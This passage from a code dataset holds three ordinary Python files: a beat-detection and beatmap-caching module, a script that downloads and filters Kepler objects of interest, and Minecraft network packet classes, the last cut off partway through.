1:\n            if mode == 1:\n                step = int((beatmap[1] - beatmap[0]) / (int(shift//1) + 1))\n                beatmap = np.insert(arr = beatmap, obj = 1, values = np.linspace(start = beatmap[0] + step - 1, stop = 1 + beatmap[1] - step, num = int(shift//1)))\n            elif mode == 2:\n                for i in range(int(shift//1)):\n                    beatmap = np.insert(arr = beatmap, obj = (i*2)+1, values = int((beatmap[i*2] + beatmap[(i*2)+1])/2))\n        # shift beatmap by the decimal value\n        if shift%1 != 0:\n            shift = shift%1\n            for i in reversed(range(len(beatmap))):\n                if i==0: continue\n                beatmap[i] = int(beatmap[i] - shift * (beatmap[i] - beatmap[i-1]))\n    return beatmap\n\ndef generate(audio: np.ndarray, sr: int, lib='madmom.BeatDetectionProcessor', caching=True, filename: str = None, log = True, load_settings = True, split=None):\n    \"\"\"Creates beatmap attribute with a list of positions of beats in samples.\"\"\"\n    if log is True: print(f'Analyzing beats using {lib}; ', end='')\n\n    # bind beatmap up front so the name exists even when caching is disabled\n    beatmap = None\n\n    # load a beatmap if it is cached:\n    if caching is True and filename is not None:\n        audio_id=hex(len(audio[0]))\n        import os\n        if not os.path.exists('beat_manipulator/beatmaps'):\n            os.mkdir('beat_manipulator/beatmaps')\n        cacheDir=\"beat_manipulator/beatmaps/\" + ''.join(filename.replace('\\\\', '/').split('/')[-1]) + \"_\"+lib+\"_\"+audio_id+'.txt'\n        try: \n            beatmap=np.loadtxt(cacheDir, dtype=int)\n            if log is True: print('loaded cached beatmap.')\n        except OSError: \n            if log is True:print(\"beatmap hasn't been generated yet. Generating...\")\n            beatmap = None\n\n    #generate the beatmap\n    if beatmap is None:\n        if 'madmom' in lib.lower():\n            from collections.abc import MutableMapping, MutableSequence\n            import madmom\n            assert len(audio[0])>sr*2, f'Audio file is too short, len={len(audio[0])} samples, or {len(audio[0])/sr} seconds. 
Minimum length is 2 seconds, audio below that breaks madmom processors.'\n if lib=='madmom.BeatTrackingProcessor':\n proc = madmom.features.beats.BeatTrackingProcessor(fps=100)\n act = madmom.features.beats.RNNBeatProcessor()(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n elif lib=='madmom.BeatTrackingProcessor.constant':\n proc = madmom.features.beats.BeatTrackingProcessor(fps=100, look_ahead=None)\n act = madmom.features.beats.RNNBeatProcessor()(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n elif lib=='madmom.BeatTrackingProcessor.consistent':\n proc = madmom.features.beats.BeatTrackingProcessor(fps=100, look_ahead=None, look_aside=0)\n act = madmom.features.beats.RNNBeatProcessor()(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n elif lib=='madmom.BeatDetectionProcessor':\n proc = madmom.features.beats.BeatDetectionProcessor(fps=100)\n act = madmom.features.beats.RNNBeatProcessor()(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n elif lib=='madmom.BeatDetectionProcessor.consistent':\n proc = madmom.features.beats.BeatDetectionProcessor(fps=100, look_aside=0)\n act = madmom.features.beats.RNNBeatProcessor()(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n elif lib=='madmom.CRFBeatDetectionProcessor':\n proc = madmom.features.beats.CRFBeatDetectionProcessor(fps=100)\n act = madmom.features.beats.RNNBeatProcessor()(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n elif lib=='madmom.CRFBeatDetectionProcessor.constant':\n proc = madmom.features.beats.CRFBeatDetectionProcessor(fps=100, use_factors=True, factors=[0.5, 1, 2])\n act = madmom.features.beats.RNNBeatProcessor()(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n elif lib=='madmom.DBNBeatTrackingProcessor':\n proc = madmom.features.beats.DBNBeatTrackingProcessor(fps=100)\n act = madmom.features.beats.RNNBeatProcessor()(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n elif lib=='madmom.DBNBeatTrackingProcessor.1000':\n proc = madmom.features.beats.DBNBeatTrackingProcessor(fps=100, transition_lambda=1000)\n act = madmom.features.beats.RNNBeatProcessor()(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n elif lib=='madmom.DBNDownBeatTrackingProcessor':\n proc = madmom.features.downbeats.DBNDownBeatTrackingProcessor(beats_per_bar=[4], fps=100)\n act = madmom.features.downbeats.RNNDownBeatProcessor()(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n beatmap=beatmap[:,0]\n elif lib=='madmom.PatternTrackingProcessor': #broken\n from madmom.models import PATTERNS_BALLROOM\n proc = madmom.features.downbeats.PatternTrackingProcessor(PATTERNS_BALLROOM, fps=50)\n from madmom.audio.spectrogram import LogarithmicSpectrogramProcessor, SpectrogramDifferenceProcessor, MultiBandSpectrogramProcessor\n from madmom.processors import SequentialProcessor\n log = LogarithmicSpectrogramProcessor()\n diff = SpectrogramDifferenceProcessor(positive_diffs=True)\n mb = MultiBandSpectrogramProcessor(crossover_frequencies=[270])\n pre_proc = SequentialProcessor([log, diff, mb])\n act = pre_proc(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n beatmap=beatmap[:,0]\n elif lib=='madmom.DBNBarTrackingProcessor': #broken\n beats = generate(audio=audio, sr=sr, filename=filename, lib='madmom.DBNBeatTrackingProcessor', caching = caching)\n proc = madmom.features.downbeats.DBNBarTrackingProcessor(beats_per_bar=[4], fps=100)\n act = 
madmom.features.downbeats.RNNBarProcessor()(((madmom.audio.signal.Signal(audio.T, sr)), beats))\n            beatmap= proc(act)*sr\n        elif lib=='librosa': #broken in 3.9, works in 3.8\n            import librosa\n            beat_frames = librosa.beat.beat_track(y=audio[0], sr=sr, hop_length=512)\n            beatmap = librosa.frames_to_samples(beat_frames[1])\n        \n        # save the beatmap and return\n        if caching is True and filename is not None: np.savetxt(cacheDir, beatmap.astype(int), fmt='%d')\n        if not isinstance(beatmap, np.ndarray): beatmap=np.asarray(beatmap, dtype=int)\n        else: beatmap=beatmap.astype(int)\n\n    if load_settings is True and filename is not None:\n        settingsDir=\"beat_manipulator/beatmaps/\" + ''.join(filename.split('/')[-1]) + \"_\"+lib+\"_\"+audio_id+'_settings.txt'\n        if os.path.exists(settingsDir):\n            with open(settingsDir, 'r') as f:\n                settings = f.read().split(',')\n            if settings[0] != 'None': beatmap = scale(beatmap, settings[0], log = False)\n            if settings[1] != 'None': beatmap = shift(beatmap, settings[1], log = False)\n            if settings[2] != 'None': beatmap = np.sort(np.absolute(beatmap - int(settings[2])))\n\n    return beatmap\n\n\n\ndef save_settings(audio: np.ndarray, filename: str = None, lib: str = 'madmom.BeatDetectionProcessor', scale: float = None, shift: float = None, adjust: int = None, normalized: str = None, log = True, overwrite = 'ask'):\n    if isinstance(overwrite, str): overwrite = overwrite.lower()\n    audio_id=hex(len(audio[0]))\n    cacheDir=\"beat_manipulator/beatmaps/\" + ''.join(filename.split('/')[-1]) + \"_\"+lib+\"_\"+audio_id+'.txt'\n    import os\n    assert os.path.exists(cacheDir), f\"Beatmap `{cacheDir}` doesn't exist\"\n    settingsDir=\"beat_manipulator/beatmaps/\" + ''.join(filename.split('/')[-1]) + \"_\"+lib+\"_\"+audio_id+'_settings.txt'\n\n    try: \n        a = utils._safer_eval_strict(scale)\n        if a == 1: scale = None\n    except Exception as e: assert scale is None, f'scale = `{scale}` - Not a valid scale, should be either a number, a math expression, or None: {e}'\n    try: \n        a = utils._safer_eval_strict(shift)\n        if a == 0: shift = None\n    except Exception as e: assert shift is None, f'shift = `{shift}` - Not a valid shift: {e}'\n    assert isinstance(adjust, int) or adjust is None, f'adjust = `{adjust}` should be int, but it is `{type(adjust)}`'\n    \n    if adjust == 0: adjust = None\n\n    if os.path.exists(settingsDir):\n        if overwrite == 'ask' or overwrite =='a': \n            what = input(f'`{settingsDir}` already exists. 
Overwrite (y/n)?: ')\n if not (what.lower() == 'y' or what.lower() == 'yes'): return\n elif not (overwrite == 'true' or overwrite =='y' or overwrite =='yes' or overwrite is True): return\n \n with open(settingsDir, 'w') as f:\n f.write(f'{scale},{shift},{adjust},{normalized}')\n if log is True: print(f\"Saved scale = `{scale}`, shift = `{shift}`, adjust = `{adjust}` to `{settingsDir}`\")\n\n","repo_name":"stunlocked1/beat_manipulator","sub_path":"beat_manipulator/beatmap.py","file_name":"beatmap.py","file_ext":"py","file_size_in_byte":10763,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"33494307983","text":"\"\"\"Download the KOIs.\"\"\"\n\nimport numpy as np\nimport kplr\nfrom kplr import KOI\nimport pickle\n\n\ndef GetKOIs():\n \"\"\"Return a list of all KOIs with minor vetting.\"\"\"\n try:\n kois = pickle.load(open(\"kois.pickle\", \"rb\"))\n except (FileNotFoundError, pickle.UnpicklingError):\n\n # A little hack\n KOI._id = '{kepid}'\n client = kplr.API()\n\n # Get all the DR25 KOIs\n columns = ('kepid', 'kepoi_name', 'kepler_name', 'koi_pdisposition',\n 'koi_period', 'koi_period_err1', 'koi_period_err2',\n 'koi_impact', 'koi_impact_err1', 'koi_impact_err2',\n 'koi_duration', 'koi_duration_err1', 'koi_duration_err2',\n 'koi_ror', 'koi_ror_err1', 'koi_ror_err2',\n 'koi_srho', 'koi_srho_err1', 'koi_srho_err2',\n 'koi_score')\n params = {\"select\": \",\".join(columns)}\n kois = [kplr.KOI(client, k) for k in\n client.ea_request(\"q1_q17_dr25_koi\", **params)]\n\n # Get all the stars, and add their properties to\n # the KOIs\n columns = ('kepid', 'radius', 'radius_err1', 'radius_err2',\n 'mass', 'mass_err1', 'mass_err2',\n 'teff_prov')\n params = {\"select\": \",\".join(columns)}\n all_stars = client.ea_request(\"q1_q17_dr25_stellar\", **params)\n kepids = np.array([s['kepid'] for s in all_stars])\n for i, koi in enumerate(kois):\n koi.kepid\n ind = np.argmax(kepids == koi.kepid)\n for k, v in all_stars[ind].items():\n setattr(kois[i], 'star_' + k, v)\n\n # Apply some filters.\n good = []\n for i, koi in enumerate(kois):\n\n # False positive\n if koi.koi_pdisposition == 'FALSE POSITIVE':\n continue\n\n # No stellar data for this KOI\n elif koi.star_teff_prov == 'Solar':\n continue\n\n # Some important value is None\n elif koi.koi_impact is None:\n continue\n\n # Low score\n elif koi.koi_score < 0.9:\n continue\n\n # Bad impact parameter\n elif koi.koi_impact >= 1:\n continue\n\n # This target is OK\n else:\n good.append(i)\n\n # Make the cut\n print(\"Using %d of %d available KOIs.\" % (len(good), len(kois)))\n kois = [kois[i] for i in good]\n\n pickle.dump(kois, open(\"kois.pickle\", \"wb\"))\n\n return kois\n","repo_name":"rodluger/exoq","sub_path":"py/kois.py","file_name":"kois.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5722462688","text":"#!/usr/bin/env python3\n\nfrom __future__ import annotations\n\nfrom collections.abc import (\n Iterator as _Iterator,\n)\n\nimport json as _json\nimport math as _math\n\nfrom itertools import islice as _islice\n\nfrom uuid import UUID as _UUID\n\nfrom ..packet import MinecraftPacketWithID as _MinecraftPacketWithID\n\nfrom ...utils import byte as _byte\nfrom ...utils import iter as _iter\n\n\nclass Packet(_MinecraftPacketWithID):\n\n pass\n\n\nclass SpawnLivingEntity(Packet):\n\n id = 0x2\n\n def __init__(\n self,\n entity_id: int,\n entity_uuid: _UUID | str,\n entity_type: 
int,\n x: float,\n y: float,\n z: float,\n yaw: float,\n pitch: float,\n head_pitch: float,\n velocity_x: float,\n velocity_y: float,\n velocity_z: float,\n ) -> None:\n\n if entity_uuid and not isinstance(entity_uuid, _UUID):\n entity_uuid = _UUID(entity_uuid)\n\n super().__init__()\n\n self.entity_id = entity_id\n self.entity_uuid = entity_uuid\n self.entity_type = entity_type\n self.x = x\n self.y = y\n self.z = z\n self.yaw = yaw\n self.pitch = pitch\n self.head_pitch = head_pitch\n self.velocity_x = velocity_x\n self.velocity_y = velocity_y\n self.velocity_z = velocity_z\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'entity_id',\n 'entity_uuid',\n 'entity_type',\n 'x',\n 'y',\n 'z',\n 'yaw',\n 'pitch',\n 'head_pitch',\n 'velocity_x',\n 'velocity_y',\n 'velocity_z',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b%b%b%b%b%c%c%c%b%b%b' % (\n _byte.render_varint(self.entity_id),\n self.entity_uuid.bytes,\n _byte.render_varint(self.entity_type),\n _byte.render_double(self.x),\n _byte.render_double(self.y),\n _byte.render_double(self.z),\n round(self.yaw / 1.40625) & 0xff,\n round(self.pitch / 1.40625) & 0xff,\n round(self.head_pitch / 1.40625) & 0xff,\n round(self.velocity_x * 8000).to_bytes(2, 'big', signed=True),\n round(self.velocity_y * 8000).to_bytes(2, 'big', signed=True),\n round(self.velocity_z * 8000).to_bytes(2, 'big', signed=True),\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.entity_id = _iter.consume_varint(it)\n self.entity_uuid = _UUID(bytes=bytes(_islice(it, 16)))\n self.entity_type = _iter.consume_varint(it)\n self.x = _iter.consume_double(it)\n self.y = _iter.consume_double(it)\n self.z = _iter.consume_double(it)\n self.yaw = next(it) * 1.40625\n self.pitch = next(it) * 1.40625\n self.head_pitch = next(it) * 1.40625\n self.velocity_x = int.from_bytes(_islice(it, 2), 'big', signed=True) / 8000\n self.velocity_y = int.from_bytes(_islice(it, 2), 'big', signed=True) / 8000\n self.velocity_z = int.from_bytes(_islice(it, 2), 'big', signed=True) / 8000\n () = it\n\n assert 0 <= self.entity_type <= 112\n assert _math.isfinite(self.x)\n assert _math.isfinite(self.y)\n assert _math.isfinite(self.z)\n\n\nclass ServerDifficulty(Packet):\n\n id = 0xe\n\n def __init__(self, difficulty: int = 2, locked: bool = True) -> None:\n\n super().__init__()\n\n self.difficulty = difficulty\n self.locked = locked\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'difficulty',\n 'locked',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%c%c' % (\n self.difficulty,\n self.locked,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.difficulty = next(it)\n self.locked = bool(next(it))\n () = it\n\n assert 0 <= self.difficulty <= 3\n\n\nclass ChatMessage(Packet):\n\n id = 0xf\n\n def __init__(\n self,\n data: dict = None,\n position: int = 0,\n sender: _UUID = None,\n ) -> None:\n\n if sender and not isinstance(sender, _UUID):\n sender = _UUID(sender)\n\n super().__init__()\n\n self.data = data\n self.position = position\n self.sender = sender\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'data',\n 'position',\n 'sender',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%c%b' % (\n _byte.render_varstr(_json.dumps(self.data, 
separators=(',', ':'))),\n self.position,\n self.sender.bytes,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.data = _json.loads(_iter.consume_varstr(it))\n self.position = next(it)\n self.sender = _UUID(bytes=bytes(_islice(it, 16)))\n () = it\n\n assert 0 <= self.position <= 2\n\n\n# TODO: complete\nclass DeclareCommands(Packet):\n\n id = 0x12\n\n def __init__(self, raw_tail: bytes) -> None:\n\n super().__init__()\n\n # ...\n self.raw_tail = raw_tail\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n # ...,\n 'raw_tail',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b' % (\n # ...,\n self.raw_tail,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n # ...\n self.raw_tail = bytes(it)\n # () = it\n\n\n# TODO: complete\nclass WindowItems(Packet):\n\n id = 0x14\n\n def __init__(self, window_id: int, state_id: int, raw_tail: bytes) -> None:\n\n super().__init__()\n\n self.window_id = window_id\n self.state_id = state_id\n # ...\n self.raw_tail = raw_tail\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'window_id',\n 'state_id',\n # ...,\n 'raw_tail',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%c%b%b' % (\n self.window_id,\n _byte.render_varint(self.state_id),\n # ...,\n self.raw_tail,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.window_id = next(it)\n self.state_id = _iter.consume_varint(it)\n # ...\n self.raw_tail = bytes(it)\n # () = it\n\n\nclass PluginMessage(Packet):\n\n id = 0x18\n\n def __init__(\n self,\n namespace: str = 'minecraft',\n channel: str = None,\n data: bytes | bytearray = None,\n ) -> None:\n\n super().__init__()\n\n self.namespace = namespace\n self.channel = channel\n self.data = data\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'namespace',\n 'channel',\n 'data',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b' % (\n _byte.render_identifier(self.namespace, self.channel),\n self.data,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.namespace, self.channel = _iter.consume_identifier(it)\n self.data = bytes(it)\n\n\nclass EntityTrigger(Packet):\n\n id = 0x1b\n\n def __init__(self, entity_id: int, trigger: int) -> None:\n\n super().__init__()\n\n self.entity_id = entity_id\n self.trigger = trigger\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'entity_id',\n 'trigger',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%c' % (\n self.entity_id.to_bytes(4, 'big'),\n self.trigger,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.entity_id = int.from_bytes(_islice(it, 4), 'big')\n self.trigger = next(it)\n () = it\n\n assert 0 <= self.trigger <= 60\n\n\nclass InitializeWorldBorder(Packet):\n\n id = 0x20\n\n def __init__(\n self,\n x: float,\n z: float,\n old_diameter: float,\n new_diameter: float,\n speed: float,\n portal_teleport_boundary: int,\n warning_blocks: int,\n warning_time: int,\n ) -> None:\n\n super().__init__()\n\n self.x = x\n self.z = z\n self.old_diameter = old_diameter\n self.new_diameter = 
new_diameter\n self.speed = speed\n self.portal_teleport_boundary = portal_teleport_boundary\n self.warning_blocks = warning_blocks\n self.warning_time = warning_time\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'x',\n 'z',\n 'old_diameter',\n 'new_diameter',\n 'speed',\n 'portal_teleport_boundary',\n 'warning_blocks',\n 'warning_time',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b%b%b%b%b%b%b' % (\n _byte.render_double(self.x),\n _byte.render_double(self.z),\n _byte.render_double(self.old_diameter),\n _byte.render_double(self.new_diameter),\n _byte.render_varlong(round(self.speed * 1000)),\n _byte.render_varint(self.portal_teleport_boundary),\n _byte.render_varint(self.warning_blocks),\n _byte.render_varint(self.warning_time),\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.x = _iter.consume_double(it)\n self.z = _iter.consume_double(it)\n self.old_diameter = _iter.consume_double(it)\n self.new_diameter = _iter.consume_double(it)\n self.speed = _iter.consume_varlong(it) / 1000\n self.portal_teleport_boundary = _iter.consume_varint(it)\n self.warning_blocks = _iter.consume_varint(it)\n self.warning_time = _iter.consume_varint(it)\n () = it\n\n assert _math.isfinite(self.x)\n assert _math.isfinite(self.z)\n assert _math.isfinite(self.old_diameter) and self.old_diameter > 0\n assert _math.isfinite(self.new_diameter) and self.new_diameter > 0\n\n\n# TODO: complete\nclass ChunkData(Packet):\n\n id = 0x22\n\n def __init__(\n self,\n chunk_x: int,\n chunk_z: int,\n # ...,\n raw_tail: bytes,\n ) -> None:\n\n super().__init__()\n\n self.chunk_x = chunk_x\n self.chunk_z = chunk_z\n # ...\n self.raw_tail = raw_tail\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'chunk_x',\n 'chunk_z',\n # ...,\n 'raw_tail',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b%b' % (\n self.chunk_x.to_bytes(4, 'big', signed=True),\n self.chunk_z.to_bytes(4, 'big', signed=True),\n # ...,\n self.raw_tail,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.chunk_x = int.from_bytes(_islice(it, 4), 'big', signed=True)\n self.chunk_z = int.from_bytes(_islice(it, 4), 'big', signed=True)\n # ...\n self.raw_tail = bytes(it)\n # () = it\n\n\n# TODO: complete\nclass UpdateLight(Packet):\n\n id = 0x25\n\n def __init__(\n self,\n chunk_x: int,\n chunk_z: int,\n trust_edges: bool,\n # ...,\n raw_tail: bytes,\n ) -> None:\n\n super().__init__()\n\n self.chunk_x = chunk_x\n self.chunk_z = chunk_z\n self.trust_edges = trust_edges\n # ...\n self.raw_tail = raw_tail\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'chunk_x',\n 'chunk_z',\n 'trust_edges',\n # ...,\n 'raw_tail',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b%c%b' % (\n _byte.render_varint(self.chunk_x),\n _byte.render_varint(self.chunk_z),\n self.trust_edges,\n # ...,\n self.raw_tail,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.chunk_x = _iter.consume_varint(it)\n self.chunk_z = _iter.consume_varint(it)\n self.trust_edges = bool(next(it))\n # ...\n self.raw_tail = bytes(it)\n # () = it\n\n\n# TODO: complete\nclass JoinGame(Packet):\n\n id = 0x26\n\n def __init__(\n self,\n entity_id: int,\n hardcore: bool,\n gamemode: 
int,\n previous_gamemode: int,\n # dimension: int,\n # hashed_seed: int,\n # max_players: int = 20,\n # level_type: str = 'default',\n # view_distance: int = 10,\n # reduced_debug_info: bool = False,\n # enable_respawn_screen: bool = True,\n raw_tail: bytes,\n ) -> None:\n\n super().__init__()\n\n self.entity_id = entity_id\n self.hardcore = hardcore\n self.gamemode = gamemode\n self.previous_gamemode = previous_gamemode\n # self.dimension = dimension\n # self.hashed_seed = hashed_seed\n # self.max_players = max_players\n # self.level_type = level_type\n # self.view_distance = view_distance\n # self.reduced_debug_info = reduced_debug_info\n # self.enable_respawn_screen = enable_respawn_screen\n self.raw_tail = raw_tail\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'entity_id',\n 'hardcore',\n 'gamemode',\n 'previous_gamemode',\n # 'dimension',\n # 'hashed_seed',\n # 'max_players',\n # 'level_type',\n # 'view_distance',\n # 'reduced_debug_info',\n # 'enable_respawn_screen',\n 'raw_tail',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%c%c%c%b' % (\n self.entity_id.to_bytes(4, 'big', signed=True),\n self.hardcore,\n self.gamemode,\n self.previous_gamemode & 0xff,\n # self.dimension.to_bytes(4, 'big', signed=True),\n # self.hashed_seed.to_bytes(8, 'big', signed=True),\n # self.max_players,\n # _byte.render_varstr(self.level_type),\n # _byte.render_varint(self.view_distance),\n # self.reduced_debug_info,\n # self.enable_respawn_screen,\n self.raw_tail,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.entity_id = int.from_bytes(_islice(it, 4), 'big', signed=True)\n self.hardcore = bool(next(it))\n self.gamemode = next(it)\n self.previous_gamemode = (next(it) ^ 0x80) - 0x80\n # self.dimension = int.from_bytes(_islice(it, 4), 'big', signed=True)\n # self.hashed_seed = int.from_bytes(_islice(it, 8), 'big', signed=True)\n # self.max_players = next(it)\n # self.level_type = _iter.consume_varstr(it)\n # self.view_distance = _iter.consume_varint(it)\n # self.reduced_debug_info = bool(next(it))\n # self.enable_respawn_screen = bool(next(it))\n self.raw_tail = bytes(it)\n # () = it\n\n assert self.entity_id != 0\n assert 0 <= self.gamemode <= 3\n assert -1 <= self.previous_gamemode <= 3\n # assert -1 <= self.dimension <= 1\n # assert self.max_players > 0\n # assert self.level_type in [\n # 'default',\n # 'flat',\n # 'largeBiomes',\n # 'amplified',\n # 'customized',\n # 'buffet',\n # 'default_1_1',\n # ]\n # assert 2 <= self.view_distance <= 32\n\n\nclass PlayerAbilities(Packet):\n\n id = 0x32\n\n def __init__(\n self,\n flags: int = 0,\n flying_speed: float = 0.05,\n fov_modifier: float = 0.1,\n ) -> None:\n\n super().__init__()\n\n self.flags = flags\n self.flying_speed = flying_speed\n self.fov_modifier = fov_modifier\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'flags',\n 'flying_speed',\n 'fov_modifier',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%c%b%b' % (\n self.flags,\n _byte.render_float(self.flying_speed),\n _byte.render_float(self.fov_modifier),\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.flags = next(it)\n self.flying_speed = _iter.consume_float(it)\n self.fov_modifier = _iter.consume_float(it)\n () = it\n\n assert not (self.flags & ~0xf)\n assert _math.isfinite(self.flying_speed) and 
self.flying_speed >= 0\n assert _math.isfinite(self.fov_modifier) and self.fov_modifier >= 0\n\n\nclass PlayerInfo(Packet):\n\n id = 0x36\n\n def __init__(\n self,\n action: int = 0,\n updates: dict[_UUID, dict[str, int | str | dict] | None] = None,\n ) -> None:\n\n super().__init__()\n\n self.action = action\n self.updates = updates\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'action',\n 'updates',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n payload = _byte.render_varint(self.action)\n\n payload += _byte.render_varint(len(self.updates))\n for uuid, update in self.updates.items():\n payload += uuid.bytes\n\n if self.action == 0:\n payload += _byte.render_varstr(update['name'])\n\n properties = update['properties']\n payload += _byte.render_varint(len(properties))\n for name, (value, signature) in properties.items():\n payload += _byte.render_varstr(name)\n payload += _byte.render_varstr(value)\n payload += (b'\\x00' if signature is None else\n b'\\x01' + _byte.render_varstr(signature))\n\n if self.action in (0, 1):\n payload += _byte.render_varint(update['gamemode'])\n\n if self.action in (0, 2):\n payload += _byte.render_varint(update['ping'])\n\n if self.action in (0, 3):\n display_name = update['display_name']\n payload += (b'\\x00' if display_name is None else\n b'\\x01' + _byte.render_varstr(display_name))\n\n return payload\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.action = _iter.consume_varint(it)\n assert 0 <= self.action <= 4\n\n self.updates = {}\n for _ in range(_iter.consume_varint(it)):\n uuid = _UUID(bytes=bytes(_islice(it, 16)))\n if self.action == 4:\n self.updates[uuid] = None\n continue\n\n update = self.updates[uuid] = {}\n\n if self.action == 0:\n update['name'] = _iter.consume_varstr(it)\n properties = update['properties'] = {}\n for __ in range(_iter.consume_varint(it)):\n name = _iter.consume_varstr(it)\n value = _iter.consume_varstr(it)\n signature = _iter.consume_varstr(it) if next(it) else None\n properties[name] = (value, signature)\n update['properties'] = properties\n\n if self.action in (0, 1):\n update['gamemode'] = _iter.consume_varint(it)\n\n if self.action in (0, 2):\n update['ping'] = _iter.consume_varint(it)\n\n if self.action in (0, 3):\n update['display_name'] = (_iter.consume_varstr(it)\n if next(it) else None)\n () = it\n\n\nclass PlayerPositionAndLook(Packet):\n\n id = 0x38\n\n def __init__(\n self,\n x: float = 0.0,\n y: float = 0.0,\n z: float = 0.0,\n yaw: float = 0.0,\n pitch: float = 0.0,\n flags: int = 0,\n teleport_id: int = 0,\n dismount_vehicle: bool = False,\n ) -> None:\n\n super().__init__()\n\n self.x = x\n self.y = y\n self.z = z\n self.yaw = yaw\n self.pitch = pitch\n self.flags = flags\n self.teleport_id = teleport_id\n self.dismount_vehicle = dismount_vehicle\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'x',\n 'y',\n 'z',\n 'yaw',\n 'pitch',\n 'flags',\n 'teleport_id',\n 'dismount_vehicle',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b%b%b%b%c%b%c' % (\n _byte.render_double(self.x),\n _byte.render_double(self.y),\n _byte.render_double(self.z),\n _byte.render_float(self.yaw),\n _byte.render_float(self.pitch),\n self.flags,\n _byte.render_varint(self.teleport_id),\n self.dismount_vehicle,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n 
